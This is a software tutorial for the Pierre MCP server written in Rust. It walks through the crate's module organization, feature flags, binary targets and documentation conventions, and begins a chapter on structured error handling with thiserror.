Pierre MCP Server Tutorial
Welcome to the comprehensive tutorial for building production-grade MCP (Model Context Protocol) servers in Rust.
What You’ll Learn
This tutorial takes you through every aspect of the Pierre Fitness Intelligence platform, a real-world production MCP server implementation. You’ll learn:
- Production Rust Architecture - Module organization, error handling, configuration management
- Security & Authentication - JWT tokens, cryptographic key management, multi-tenant isolation
- Protocol Implementation - JSON-RPC 2.0, MCP protocol, A2A (Agent-to-Agent) communication
- OAuth 2.0 - Both server and client implementations with PKCE support
- Provider Integration - Pluggable provider architecture for fitness APIs (Strava, Garmin, Fitbit, etc.)
- Sports Science - Real algorithms for TSS, VDOT, FTP, CTL/ATL/TSB
- Testing - Comprehensive testing patterns for async Rust applications
Prerequisites
Before starting this tutorial, you should have:
- Basic Rust knowledge (ownership, borrowing, traits, async/await)
- Familiarity with `cargo` and Rust project structure
- Understanding of HTTP APIs and JSON
- Basic knowledge of OAuth 2.0 (helpful but not required)
How to Use This Tutorial
Each chapter builds on previous ones but can also be read standalone for reference:
- Chapters 1-4: Start here for foundational concepts
- Chapters 5-8: Security-focused deep dive
- Chapters 9-14: Protocol implementation details
- Chapters 15-18: OAuth and provider integration
- Chapters 19-22: Domain-specific implementation
- Chapters 23-31: Operations and advanced topics
Each chapter includes:
- Prerequisites - Prior knowledge needed
- Code Examples - Real code from the Pierre codebase
- Rust Idioms - Explanations of patterns and best practices
About Pierre
Pierre is a fitness intelligence platform that provides:
- 47 MCP tools for fitness data analysis
- Multi-tenant SaaS architecture with complete data isolation
- OAuth 2.0 server for MCP client authentication
- Pluggable provider system supporting Strava, Garmin, Fitbit, WHOOP, COROS, and Terra
- Sports science algorithms for training load, performance, and recovery analysis
- Local LLM support via OpenAI-compatible APIs (Ollama, vLLM, LocalAI)
The codebase demonstrates production-grade Rust patterns:
- Zero `unsafe` code policy (with one approved FFI exception)
- Structured error handling (no `anyhow!` in production)
- Comprehensive test coverage (~650 tests)
- ~330 source files in a well-organized module hierarchy
Getting Started
Let’s begin with Chapter 1: Project Architecture to understand how the codebase is organized.
This tutorial is maintained alongside the Pierre MCP Server codebase.
Chapter 1: Project Architecture & Module Organization
Introduction
Pierre Fitness Platform is a production Rust application with 330 source files organized into a coherent module hierarchy. This chapter teaches you how to navigate the codebase, understand the module system, and recognize organizational patterns used throughout.
The codebase follows a “library + binaries” pattern where most functionality lives in src/lib.rs and binary entry points import from the library.
Project Structure Overview
pierre_mcp_server/
├── src/ # main rust source (library + modules)
│ ├── lib.rs # library root - central module hub
│ ├── bin/ # binary entry points
│ │ ├── pierre-mcp-server.rs # main server binary
│ │ └── admin_setup.rs # admin utilities
│ ├── mcp/ # mcp protocol implementation
│ ├── a2a/ # agent-to-agent protocol
│ ├── protocols/ # universal protocol layer
│ ├── oauth2_server/ # oauth2 authorization server
│ ├── oauth2_client/ # oauth2 client (for providers)
│ ├── providers/ # fitness provider integrations
│ ├── intelligence/ # sports science algorithms
│ ├── database/ # database repositories (13 focused traits)
│ ├── database_plugins/ # pluggable database backends (SQLite/PostgreSQL)
│ ├── middleware/ # http middleware (auth, tracing, etc)
│ ├── routes/ # http route handlers
│ └── [30+ other modules]
│
├── sdk/ # typescript sdk for stdio transport
│ ├── src/
│ │ ├── bridge.ts # stdio ↔ http bridge (2309 lines)
│ │ ├── types.ts # auto-generated tool types
│ │ └── secure-storage.ts # os keychain integration
│ └── test/ # sdk e2e tests
│
├── tests/ # integration & e2e tests
│ ├── helpers/
│ │ ├── synthetic_data.rs # fitness data generator
│ │ └── test_utils.rs # shared test utilities
│ └── [194 test files]
│
├── scripts/ # build & utility scripts
│ ├── generate-sdk-types.js # typescript type generation
│ └── lint-and-test.sh # ci validation script
│
├── templates/ # html templates (oauth pages)
├── docs/ # documentation
└── Cargo.toml # rust dependencies & config
Key Observation: The codebase is split into library code (src/lib.rs) and binary code (src/bin/). This is a Rust best practice for testability and reusability.
The Library Root: src/lib.rs
The src/lib.rs file is the central hub of the Pierre library. It declares all public modules and controls what’s exported to consumers.
File Header Pattern
Source: src/lib.rs:1-9
// ABOUTME: Main library entry point for Pierre fitness API platform
// ABOUTME: Provides MCP, A2A, and REST API protocols for fitness data analysis
//
// Licensed under either of Apache License, Version 2.0 or MIT License at your option.
// Copyright ©2025 Async-IO.org

#![recursion_limit = "256"]
#![deny(unsafe_code)]
Rust Idioms Explained:
- `// ABOUTME:` comments - Human-readable file purpose (not rustdoc)
  - Quick context for developers scanning the codebase
  - Appears at the top of all 330 source files
- Crate-level attributes `#![...]`
  - `#![recursion_limit = "256"]`: Increases the macro recursion limit
  - Required for complex derive macros (serde, thiserror)
  - Default is 128; Pierre uses 256 for deeply nested types
  - `#![deny(unsafe_code)]`: Zero-tolerance unsafe code policy
  - Compiler error if an `unsafe` block appears anywhere
  - Exception: `src/health.rs` (Windows FFI, approved via validation script)
  - See `scripts/architectural-validation.sh` for enforcement
Reference: Rust Reference - Crate Attributes
Module Documentation
Source: src/lib.rs:10-55
//! # Pierre MCP Server
//!
//! A Model Context Protocol (MCP) server for fitness data aggregation and analysis.
//! This server provides a unified interface to access fitness data from various providers
//! like Strava and Fitbit through the MCP protocol.
//!
//! ## Features
//!
//! - **Multi-provider support**: Connect to Strava, Fitbit, and more
//! - **OAuth2 authentication**: Secure authentication flow for fitness providers
//! - **MCP protocol**: Standard interface for Claude and other AI assistants
//! - **Real-time data**: Access to activities, athlete profiles, and statistics
//! - **Extensible architecture**: Easy to add new fitness providers
//!
//! ## Quick Start
//!
//! 1. Set up authentication credentials using the `auth-setup` binary
//! 2. Start the MCP server with `pierre-mcp-server`
//! 3. Connect from Claude or other MCP clients
//!
//! ## Architecture
//!
//! The server follows a modular architecture:
//! - **Providers**: Abstract fitness provider implementations
//! - **Models**: Common data structures for fitness data
//! - **MCP**: Model Context Protocol server implementation
//! - **OAuth2**: Authentication client for secure API access
//! - **Config**: Configuration management and persistence
//!
//! ## Example Usage
//!
//! ```rust,no_run
//! use pierre_mcp_server::config::environment::ServerConfig;
//! use pierre_mcp_server::errors::AppResult;
//!
//! #[tokio::main]
//! async fn main() -> AppResult<()> {
//! // Load configuration
//! let config = ServerConfig::from_env()?;
//!
//! // Start Pierre MCP Server with loaded configuration
//! println!("Pierre MCP Server configured with port: HTTP={}",
//! config.http_port);
//!
//! Ok(())
//! }
//! ```
Rust Idioms Explained:
- Module-level docs `//!` (two slashes + bang)
  - Appears in `cargo doc` output
  - Documents the containing module/crate
  - Markdown formatted for rich documentation
- `rust,no_run` code blocks
  - Syntax highlighted in docs
  - The `no_run` flag: compile-checked but not executed in doc tests
  - Ensures examples stay up-to-date with code
Reference: Rust Book - Documentation Comments
Module Declarations
Source: src/lib.rs:57-189
/// Fitness provider implementations for various services
pub mod providers;
/// Common data models for fitness data
pub mod models;
/// Cursor-based pagination for efficient data traversal
pub mod pagination;
/// Configuration management and persistence
pub mod config;
/// Focused dependency injection contexts
pub mod context;
/// Application constants and configuration values
pub mod constants;
/// OAuth 2.0 client (Pierre as client to fitness providers)
pub mod oauth2_client;
/// Model Context Protocol server implementation
pub mod mcp;
/// Athlete Intelligence for activity analysis and insights
pub mod intelligence;
/// External API clients (USDA, weather services)
pub mod external;
/// Configuration management and runtime parameter system
pub mod configuration;
// ... 30+ more module declarations
Rust Idioms Explained:
- `pub mod` declarations
  - Makes the module public to external crates
  - Each `pub mod foo;` looks for `src/foo.rs` (single-file module) or `src/foo/mod.rs` (directory module)
- Documentation comments `///` (three slashes)
  - Documents the item below (not the containing module)
  - Brief one-line summaries for each module
  - Visible in IDE tooltips and `cargo doc`
- Module ordering - Logical grouping:
  - Core domain (providers, models, pagination)
  - Configuration (config, context, constants)
  - Protocols (oauth2_client, mcp, a2a, protocols)
  - Data layer (database, database_plugins, cache)
  - Infrastructure (auth, crypto, routes, middleware)
  - Features (intelligence, external, plugins)
  - Utilities (types, utils, test_utils)
Reference: Rust Book - Modules
Conditional Compilation
Source: src/lib.rs:188-189
/// Test utilities for creating consistent test data
#[cfg(any(test, feature = "testing"))]
pub mod test_utils;
Rust Idioms Explained:
- `#[cfg(...)]` attribute
  - Conditional compilation based on configuration
  - Code only included if conditions are met
- `#[cfg(any(test, feature = "testing"))]`
  - `test`: Built-in flag when running `cargo test`
  - `feature = "testing"`: Custom feature flag from `Cargo.toml:47`
  - `any(...)`: Include if ANY condition is true
- Why use this?
  - The `test_utils` module is only needed during testing
  - Excluded from the production binary (reduces binary size)
  - Can be enabled in other crates via `features = ["testing"]`
Cargo.toml configuration:
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
testing = [] # Feature flag for test utilities
Reference: Rust Book - Conditional Compilation
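To see the mechanism end to end, here is a minimal stdlib-only sketch; the `double` and `test_utils` names are illustrative, not from the Pierre codebase. It gates a helper module behind `cfg(any(test, feature = "testing"))` exactly as Pierre gates its `test_utils` module:

```rust
// Always compiled: production code.
pub fn double(x: i32) -> i32 {
    x * 2
}

// Compiled only for `cargo test` builds, or when a dependent crate enables
// a (hypothetical) `testing` feature - mirroring Pierre's gate.
#[cfg(any(test, feature = "testing"))]
pub mod test_utils {
    pub fn sample_input() -> i32 {
        21
    }
}

#[cfg(test)]
mod tests {
    #[test]
    fn doubles_sample() {
        // test_utils is visible here because cfg(test) is active.
        assert_eq!(super::double(super::test_utils::sample_input()), 42);
    }
}

fn main() {
    // In a normal (non-test) build, test_utils is absent from the binary.
    println!("{}", double(21)); // prints 42
}
```

In a release build, neither `test_utils` nor `tests` contributes any code to the binary.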
Binary Entry Points: src/bin/
Rust crates can define multiple binary targets. Pierre has two main binaries:
Main Server Binary
Source: src/bin/pierre-mcp-server.rs:1-61
// ABOUTME: Server implementation for serving users with isolated data access
// ABOUTME: Production-ready server with authentication and user isolation capabilities
#![recursion_limit = "256"]
#![deny(unsafe_code)]
//! # Pierre Fitness API Server Binary
//!
//! This binary starts the multi-protocol Pierre Fitness API with user authentication,
//! secure token storage, and database management.
use anyhow::Result;
use clap::Parser;
use pierre_mcp_server::{
config::environment::{ServerConfig, TokioRuntimeConfig},
database_plugins::factory::Database,
mcp::{multitenant::MultiTenantMcpServer, resources::ServerResources},
// ... other imports
};
use tokio::runtime::{Builder, Runtime};
/// Command-line arguments for the Pierre MCP server
#[derive(Parser)]
#[command(name = "pierre-mcp-server")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "Pierre Fitness API - Multi-protocol fitness data API for LLMs")]
pub struct Args {
/// Configuration file path for providers
#[arg(short, long)]
config: Option<String>,
/// Override HTTP port
#[arg(long)]
http_port: Option<u16>,
}
fn main() -> Result<()> {
let args = parse_args_or_default();
// Load runtime config first to build the Tokio runtime
let runtime_config = TokioRuntimeConfig::from_env();
let runtime = build_tokio_runtime(&runtime_config)?;
// Run the async server on our configured runtime
runtime.block_on(async {
let config = setup_configuration(&args)?;
bootstrap_server(config).await
})
}
Rust Idioms Explained:
- Binary crate attributes - Same as the library (`#![...]`)
  - Each binary can have its own attributes
  - Often mirrors library settings
- `use pierre_mcp_server::...` - Importing from the library
  - The binary depends on the library crate
  - Imports only what's needed
  - Absolute paths from the crate root
- `clap::Parser` derive macro
  - Auto-generates a CLI argument parser
  - `#[command(...)]` attributes for metadata
  - `#[arg(...)]` attributes for options
  - Generates `--help` automatically
- Manual Tokio runtime building
  - Pierre uses `TokioRuntimeConfig::from_env()` for a configurable runtime
  - Worker threads and stack size configurable via environment
  - More control than the `#[tokio::main]` macro:
// Pierre's configurable runtime builder
fn build_tokio_runtime(config: &TokioRuntimeConfig) -> Result<Runtime> {
    let mut builder = Builder::new_multi_thread();
    if let Some(workers) = config.worker_threads {
        builder.worker_threads(workers);
    }
    builder.enable_all().build().map_err(Into::into)
}
Cargo.toml Binary Declarations
Source: Cargo.toml:14-29
[lib]
name = "pierre_mcp_server"
path = "src/lib.rs"
[[bin]]
name = "pierre-mcp-server"
path = "src/bin/pierre-mcp-server.rs"
[[bin]]
name = "admin-setup"
path = "src/bin/admin_setup.rs"
[[bin]]
name = "diagnose-weather-api"
path = "src/bin/diagnose_weather_api.rs"
Explanation:
- `[lib]`: Single library target
- `[[bin]]`: Multiple binary targets (double brackets = array of tables)
- Binary names can differ from file names (kebab-case vs snake_case)
Build commands:
# Build all binaries
cargo build --release
# Run specific binary
cargo run --bin pierre-mcp-server
# Install binary to ~/.cargo/bin
cargo install --path . --bin pierre-mcp-server
Module Organization Patterns
Pierre uses several module organization patterns consistently.
Single-File Modules
Example: src/errors.rs
src/
├── lib.rs # Contains: pub mod errors;
└── errors.rs # The module implementation
When a module fits in one file (roughly 100-500 lines), use the single-file pattern.
Directory Modules
Example: src/mcp/ directory
src/
├── lib.rs # Contains: pub mod mcp;
└── mcp/
├── mod.rs # Module root, declares submodules
├── protocol.rs # Submodule
├── tool_handlers.rs # Submodule
├── multitenant.rs # Submodule
└── [8 more files]
Source: src/mcp/mod.rs:1-40
// ABOUTME: MCP (Model Context Protocol) server implementation
// ABOUTME: JSON-RPC 2.0 protocol for AI assistant tool execution

//! MCP Protocol Implementation
//!
//! This module implements the Model Context Protocol (MCP) for AI assistant integration.
//! MCP is a JSON-RPC 2.0 based protocol that enables AI assistants like Claude to execute
//! tools and access resources from external services.

// Submodule declarations
pub mod protocol;
pub mod tool_handlers;
pub mod multitenant;
pub mod resources;
pub mod tenant_isolation;
pub mod oauth_flow_manager;
pub mod transport_manager;
pub mod mcp_request_processor;
pub mod server_lifecycle;
pub mod progress;
pub mod schema;

// Re-exports for convenience
pub use multitenant::MultiTenantMcpServer;
pub use resources::ServerResources;
pub use protocol::{McpRequest, McpResponse};
Rust Idioms Explained:
- `mod.rs` convention
  - Directory modules need a `mod.rs` file
  - Acts as the "index" file for the directory
  - Declares and organizes submodules
- Re-exports `pub use ...`
  - Makes deeply nested types accessible at the module root
  - Users can write `use pierre_mcp_server::mcp::MultiTenantMcpServer`
  - Instead of `use pierre_mcp_server::mcp::multitenant::MultiTenantMcpServer`
- Submodule visibility
  - `pub mod` makes a submodule public
  - `mod` (without `pub`) keeps it private to the parent module
  - All Pierre submodules are public for flexibility
Reference: Rust Book - Separating Modules into Different Files
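The re-export pattern can be reproduced with inline modules. This is a sketch with illustrative contents (the real `MultiTenantMcpServer` is a full server type, not a one-field struct):

```rust
// Nested modules, analogous to src/mcp/ and src/mcp/multitenant.rs.
pub mod mcp {
    pub mod multitenant {
        pub struct MultiTenantMcpServer {
            pub name: &'static str,
        }
    }

    // Re-export: consumers reach the type at the module root.
    pub use self::multitenant::MultiTenantMcpServer;
}

// Short path thanks to the re-export...
use self::mcp::MultiTenantMcpServer;
// ...instead of: use self::mcp::multitenant::MultiTenantMcpServer;

fn main() {
    let server = MultiTenantMcpServer { name: "pierre" };
    println!("{}", server.name); // prints pierre
}
```

Both paths remain valid; the re-export only adds a shorter alias, so refactoring internal module layout does not break downstream imports.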
Nested Directory Modules
Example: src/protocols/universal/handlers/
src/
└── protocols/
├── mod.rs
└── universal/
├── mod.rs
└── handlers/
├── mod.rs
├── fitness_api.rs
├── intelligence.rs
├── goals.rs
├── configuration.rs
├── sleep_recovery.rs
├── nutrition.rs
├── recipes.rs
└── connections.rs
Source: src/protocols/universal/handlers/mod.rs
//! MCP tool handlers for all tool categories

pub mod fitness_api;
pub mod intelligence;
pub mod goals;
pub mod configuration;
pub mod sleep_recovery;
pub mod nutrition;
pub mod recipes;
pub mod connections;

// Re-export all handler functions
pub use fitness_api::*;
pub use intelligence::*;
pub use goals::*;
pub use configuration::*;
pub use sleep_recovery::*;
pub use nutrition::*;
pub use recipes::*;
pub use connections::*;
Pattern: Deep hierarchies use mod.rs at each level to organize related functionality.
Feature Flags & Conditional Compilation
Pierre uses feature flags for optional dependencies and database backends.
Source: Cargo.toml:42-47
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
testing = []
telemetry = []
Feature Flag Usage
1. Default features
default = ["sqlite"]
Builds with SQLite by default. Users can opt out:
cargo build --no-default-features
2. Database backend selection
Source: src/database_plugins/factory.rs:30-50
pub async fn new(
    connection_string: &str,
    encryption_key: Vec<u8>,
    #[cfg(feature = "postgresql")]
    postgres_pool_config: &PostgresPoolConfig,
) -> Result<Self, DatabaseError> {
    #[cfg(feature = "sqlite")]
    if connection_string.starts_with("sqlite:") {
        let sqlite_db = SqliteDatabase::new(connection_string, encryption_key).await?;
        return Ok(Database::Sqlite(sqlite_db));
    }
    #[cfg(feature = "postgresql")]
    if connection_string.starts_with("postgres://") || connection_string.starts_with("postgresql://") {
        let postgres_db = PostgresDatabase::new(
            connection_string,
            encryption_key,
            postgres_pool_config,
        ).await?;
        return Ok(Database::Postgres(postgres_db));
    }
    Err(DatabaseError::ConfigurationError(
        "Unsupported database type in connection string".to_string()
    ))
}
Rust Idioms Explained:
- `#[cfg(feature = "...")]`
  - Code only compiled if the feature is enabled
  - The `sqlite` feature compiles SQLite code
  - The `postgresql` feature compiles PostgreSQL code
- Function parameter attributes
  - `#[cfg(feature = "postgresql")] postgres_pool_config: &PostgresPoolConfig`
  - The parameter only exists if the feature is enabled
  - Type checking happens only when the feature is active
Build commands:
# SQLite (default)
cargo build
# PostgreSQL
cargo build --no-default-features --features postgresql
# Both
cargo build --features postgresql
Reference: Cargo Book - Features
Documentation Patterns
Pierre follows consistent documentation practices across all 330 source files.
Dual-Comment Pattern
Every file has both // ABOUTME: and //! comments:
// ABOUTME: Brief human-readable purpose
// ABOUTME: Additional context
//
// License header

//! # Module Title
//!
//! Detailed rustdoc documentation
//! with markdown formatting
Benefits:
- `// ABOUTME:`: Quick context when browsing files (shows in editors)
- `//!`: Full documentation for `cargo doc` output
- Separation of concerns: quick reference vs comprehensive docs
Rustdoc Formatting
Source: src/mcp/protocol.rs:1-30
//! # MCP Protocol Implementation
//!
//! Core protocol handlers for the Model Context Protocol (MCP).
//! Implements JSON-RPC 2.0 message handling and tool execution.
//!
//! ## Supported Methods
//!
//! - `initialize`: Protocol version negotiation
//! - `tools/list`: List available tools
//! - `tools/call`: Execute a tool
//! - `resources/list`: List available resources
//!
//! ## Example
//!
//! ```rust,ignore
//! use pierre_mcp_server::mcp::protocol::handle_mcp_request;
//!
//! let response = handle_mcp_request(request).await?;
//! ```
Markdown features:
- `#` headers (h1, h2, h3)
- `-` bullet lists
- backtick `inline code`
- fenced ```rust code blocks
- `**bold**` and `*italic*`
Generate docs:
cargo doc --open # Generate & open in browser
Reference: Rust Book - Documentation
Import Conventions
Pierre follows consistent import patterns for clarity.
Absolute vs Relative Imports
Preferred: Absolute imports from crate root
use crate::errors::AppError;
use crate::database::DatabaseError;
use crate::providers::ProviderError;
Avoid: Relative imports
// Don't do this
use super::super::errors::AppError;
use ../database::DatabaseError; // Not valid Rust
Exception: Sibling modules in same directory can use super::
// In src/protocols/universal/handlers/goals.rs
use super::super::executor::UniversalToolExecutor; // Acceptable
use crate::protocols::universal::executor::UniversalToolExecutor; // Better
Grouping Imports
Source: src/bin/pierre-mcp-server.rs:15-24
// Group 1: External crates
use clap::Parser;
use std::sync::Arc;
use tracing::{error, info};

// Group 2: Internal crate imports
use pierre_mcp_server::{
    auth::AuthManager,
    cache::factory::Cache,
    config::environment::ServerConfig,
    database_plugins::{factory::Database, DatabaseProvider},
    errors::AppResult,
    logging,
    mcp::{multitenant::MultiTenantMcpServer, resources::ServerResources},
};
Convention:
- External dependencies (`clap`, `std`, `tracing`)
- Internal crate (`pierre_mcp_server::...`)
- Blank line between groups
Reference: Rust Style Guide
Navigating the Codebase
Finding Functionality
Strategy 1: Start from src/lib.rs module declarations
- Each `pub mod` has a one-line summary
- Navigate to the module's `mod.rs` for details
Strategy 2: Use grep or IDE search
# Find all files containing "OAuth"
grep -r "OAuth" src/
# Find struct definitions
grep -r "pub struct" src/
Strategy 3: Follow imports
- Open a file, read its `use` statements
- Imports show dependencies and related modules
Understanding Module Responsibilities
MCP Protocol (src/mcp/):
- protocol.rs: Core JSON-RPC handlers
- tool_handlers.rs: Tool execution routing
- multitenant.rs: Multi-tenant server wrapper
- resources.rs: Shared server resources
Protocols Layer (src/protocols/universal/):
- tool_registry.rs: Type-safe tool routing
- executor.rs: Tool execution engine
- handlers/: Business logic for each tool
Database (src/database_plugins/):
- factory.rs: Database abstraction
- sqlite.rs: SQLite implementation
- postgres.rs: PostgreSQL implementation
Diagram: Module Dependency Graph
┌─────────────────────────────────────────────────────────────┐
│ src/lib.rs │
│ (central module hub) │
└─────────────┬────────────────────────┬──────────────────────┘
│ │
┌────────▼────────┐ ┌───────▼────────┐
│ src/bin/ │ │ Public Modules │
│ - main server │ │ (40+ modules) │
│ - admin tools │ └───────┬─────────┘
└─────────────────┘ │
│
┌───────────────────────┼──────────────────────┐
│ │ │
┌────────▼────────┐ ┌─────────▼────────┐ ┌─────────▼────────┐
│ Protocols │ │ Data Layer │ │ Infrastructure │
│ - mcp/ │ │ - database/ │ │ - auth │
│ - a2a/ │ │ - database_ │ │ - middleware │
│ - protocols/ │ │ plugins/ │ │ - routes │
│ - jsonrpc/ │ │ - cache/ │ │ - logging │
└─────────────────┘ └──────────────────┘ └──────────────────┘
│ │ │
│ │ │
┌────────▼────────────────┐ │ ┌────────────▼──────────┐
│ Domain Logic │ │ │ External Services │
│ - providers/ │ │ │ - oauth2_client │
│ - intelligence/ │ │ │ - oauth2_server │
│ - configuration/ │ │ │ - external/ │
└─────────────────────────┘ │ └───────────────────────┘
│
┌────────────▼──────────┐
│ Shared Utilities │
│ - models │
│ - errors │
│ - types │
│ - utils │
│ - constants │
└───────────────────────┘
Key Observations:
- lib.rs is the hub connecting all modules
- Protocols layer is protocol-agnostic (shared by MCP & A2A)
- Data layer is abstracted (pluggable backends)
- Infrastructure is cross-cutting (auth, middleware, logging)
- Domain logic is isolated (providers, intelligence)
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
| Crate attributes `#![...]` | Set compiler flags/limits | src/lib.rs:7-8 |
| Module docs `//!` | Document containing module | All mod.rs files |
| Item docs `///` | Document following item | src/lib.rs:58+ |
| `pub mod` | Public module declaration | src/lib.rs:57-189 |
| Re-exports `pub use` | Convenience exports | src/mcp/mod.rs:24-26 |
| Feature flags `#[cfg(...)]` | Conditional compilation | src/database_plugins/factory.rs |
| Binary targets `[[bin]]` | Multiple executables | Cargo.toml:15-29 |
Key Takeaways
- Library + Binaries Pattern: Core logic in `lib.rs`, entry points in `bin/`
- Module Hierarchy: Use `pub mod` in the parent, `mod.rs` for directory modules
- Dual Documentation: `// ABOUTME:` for humans, `//!` for rustdoc
- Feature Flags: Enable optional functionality (`sqlite`, `postgresql`, `testing`)
- Import Conventions: Absolute paths from `crate::`, grouped by origin
- Zero Unsafe Code: `#![deny(unsafe_code)]` enforced via CI
Next Chapter
Chapter 2: Error Handling & Type-Safe Errors - Learn how Pierre uses thiserror for structured error types and eliminates anyhow! from production code.
Chapter 2: Error Handling & Type-Safe Errors
Introduction
Error handling is one of Rust’s greatest strengths. Unlike languages with exceptions, Rust uses the type system to enforce error handling at compile time. Pierre takes this further with a zero-tolerance policy on ad-hoc errors.
CLAUDE.md Directive (critical):
Never use `anyhow::anyhow!()` in production code.
Use structured error types exclusively: `AppError`, `DatabaseError`, `ProviderError`.
This chapter teaches you why this matters and how Pierre implements production-grade error handling.
The Problem with Anyhow
The anyhow crate is popular for quick prototyping, but has serious issues in production code.
Anyhow Example (Anti-pattern)
// DON'T DO THIS - Loses type information
use anyhow::anyhow;

fn fetch_user(id: &str) -> anyhow::Result<User> {
    if id.is_empty() {
        return Err(anyhow!("User ID cannot be empty")); // ❌ Type-erased error
    }
    let user = database.get(id)
        .ok_or_else(|| anyhow!("User not found"))?; // ❌ No structure
    Ok(user)
}
Problems:
- Type erasure: All errors become `anyhow::Error` (an opaque box)
- No pattern matching: Can't handle different error types differently
- No programmatic access: Error details are just strings
- Poor API: Callers can't know what errors to expect
- No HTTP mapping: How do you convert "User not found" to a status code?
Structured Error Example (Correct)
Source: src/database/errors.rs:11-20
// DO THIS - Type-safe, structured errors
#[derive(Error, Debug)]
pub enum DatabaseError {
    #[error("Entity not found: {entity_type} with id '{entity_id}'")]
    NotFound {
        entity_type: &'static str,
        entity_id: String,
    },
    // ... more variants
}

fn fetch_user(id: &str) -> Result<User, DatabaseError> {
    if id.is_empty() {
        return Err(DatabaseError::NotFound {
            entity_type: "user",
            entity_id: String::new(),
        });
    }
    // Callers can pattern match on this specific error
    database.get(id)
        .ok_or_else(|| DatabaseError::NotFound {
            entity_type: "user",
            entity_id: id.to_string(),
        })
}
Benefits:
- ✅ Type safety: Errors are concrete types
- ✅ Pattern matching: Can handle `NotFound` vs `ConnectionError` differently
- ✅ Programmatic access: Extract `entity_id` from the error
- ✅ Clear API: Callers know what to expect
- ✅ HTTP mapping: Easy to convert to status codes
Pierre’s Error Hierarchy
Pierre uses a three-tier error hierarchy:
AppError (src/errors.rs) ← HTTP-level errors
↓ wraps
├── DatabaseError (src/database/errors.rs) ← Database operations
├── ProviderError (src/providers/errors.rs) ← External API calls
└── ProtocolError (src/protocols/...) ← Protocol-specific errors
Design principle: Errors are defined close to their domain, then converted to AppError at API boundaries.
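A stdlib-only sketch of that boundary conversion, with both enums reduced to single illustrative variants (the real definitions live in src/errors.rs and src/database/errors.rs):

```rust
// Simplified domain error (real one: src/database/errors.rs).
#[derive(Debug)]
pub enum DatabaseError {
    NotFound { entity_type: &'static str, entity_id: String },
}

// Simplified HTTP-level error (real one: src/errors.rs).
#[derive(Debug)]
pub enum AppError {
    NotFound(String),
}

// Boundary conversion: the hand-written equivalent of a From impl
// that thiserror's #[from] attribute would generate.
impl From<DatabaseError> for AppError {
    fn from(err: DatabaseError) -> Self {
        match err {
            DatabaseError::NotFound { entity_type, entity_id } => {
                AppError::NotFound(format!("{entity_type} '{entity_id}' not found"))
            }
        }
    }
}

// The domain layer returns its own error type...
fn lookup(id: &str) -> Result<String, DatabaseError> {
    Err(DatabaseError::NotFound { entity_type: "user", entity_id: id.to_string() })
}

// ...and the API boundary converts automatically via `?`.
fn handler(id: &str) -> Result<String, AppError> {
    let user = lookup(id)?;
    Ok(user)
}

fn main() {
    match handler("u123") {
        Err(AppError::NotFound(msg)) => println!("404: {msg}"),
        other => println!("{other:?}"),
    }
}
```

The domain module never needs to know about HTTP; only the boundary layer decides how a `NotFound` maps to a response.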
Thiserror: Derive Macro for Errors
The thiserror crate provides a derive macro that auto-implements std::error::Error and Display.
Basic Thiserror Usage
Source: src/database/errors.rs:11-56
use thiserror::Error;

#[derive(Error, Debug)]
pub enum DatabaseError {
    /// Entity not found in database
    #[error("Entity not found: {entity_type} with id '{entity_id}'")]
    NotFound {
        entity_type: &'static str,
        entity_id: String,
    },

    /// Cross-tenant access attempt detected
    #[error("Tenant isolation violation: attempted to access {entity_type} '{entity_id}' from tenant '{requested_tenant}' but it belongs to tenant '{actual_tenant}'")]
    TenantIsolationViolation {
        entity_type: &'static str,
        entity_id: String,
        requested_tenant: String,
        actual_tenant: String,
    },

    /// Encryption operation failed
    #[error("Encryption failed: {context}")]
    EncryptionFailed {
        context: String,
    },

    /// Decryption operation failed
    #[error("Decryption failed: {context}")]
    DecryptionFailed {
        context: String,
    },

    /// Database constraint violation
    #[error("Constraint violation: {constraint} - {details}")]
    ConstraintViolation {
        constraint: String,
        details: String,
    },
}
Rust Idioms Explained:
- `#[derive(Error, Debug)]`
  - `Error`: thiserror's derive macro
  - `Debug`: Required by the `std::error::Error` trait
  - Auto-implements `Display` using the `#[error(...)]` attributes
- `#[error("...")]` format strings
  - Defines the `Display` implementation
  - Use `{field_name}` to interpolate struct fields
  - Same syntax as the `format!()` macro
- Enum variants with fields
  - Struct-like variants: `NotFound { entity_type, entity_id }`
  - Tuple variants: `ConnectionError(String)`
  - Unit variants: `Timeout` (no fields)
- Documentation comments `///`
  - Document each variant's purpose
  - Appears in IDE tooltips and `cargo doc`
Generated code (what thiserror creates):
// thiserror automatically generates this:
impl std::fmt::Display for DatabaseError {
    fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
        match self {
            Self::NotFound { entity_type, entity_id } => {
                write!(f, "Entity not found: {} with id '{}'", entity_type, entity_id)
            }
            // ... other variants
        }
    }
}

impl std::error::Error for DatabaseError {}
Reference: thiserror documentation
Error Variant Design Patterns
Pierre uses several patterns for error variants.
Pattern 1: Struct-Like Variants with Context
Source: src/providers/errors.rs:13-23
#[derive(Error, Debug)]
pub enum ProviderError {
    /// Provider API is unavailable or returning errors
    #[error("Provider {provider} API error: {status_code} - {message}")]
    ApiError {
        provider: String,
        status_code: u16,
        message: String,
        retryable: bool, // ← Extra context for retry logic
    },
}
Use when: You need multiple pieces of context (who, what, why)
Pattern matching:
match error {
    ProviderError::ApiError { status_code: 429, provider, .. } => {
        println!("Rate limited by {provider}, back off before retrying");
    }
    ProviderError::ApiError { status_code, retryable: true, .. } if status_code >= 500 => {
        println!("Server error, retry with backoff");
    }
    _ => println!("Non-retryable error"),
}
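The same dispatch, reduced to a runnable classifier over the fields the enum actually defines (the category strings here are illustrative, not Pierre's):

```rust
#[derive(Debug)]
enum ProviderError {
    ApiError { provider: String, status_code: u16, message: String, retryable: bool },
}

// Map a structured error onto a retry decision by matching on its fields.
fn classify(err: &ProviderError) -> &'static str {
    match err {
        ProviderError::ApiError { status_code: 429, .. } => "rate_limited",
        ProviderError::ApiError { status_code, retryable: true, .. } if *status_code >= 500 => {
            "retry_with_backoff"
        }
        ProviderError::ApiError { .. } => "non_retryable",
    }
}

fn main() {
    let err = ProviderError::ApiError {
        provider: "strava".to_string(),
        status_code: 429,
        message: "too many requests".to_string(),
        retryable: true,
    };
    println!("{}", classify(&err)); // prints rate_limited
}
```

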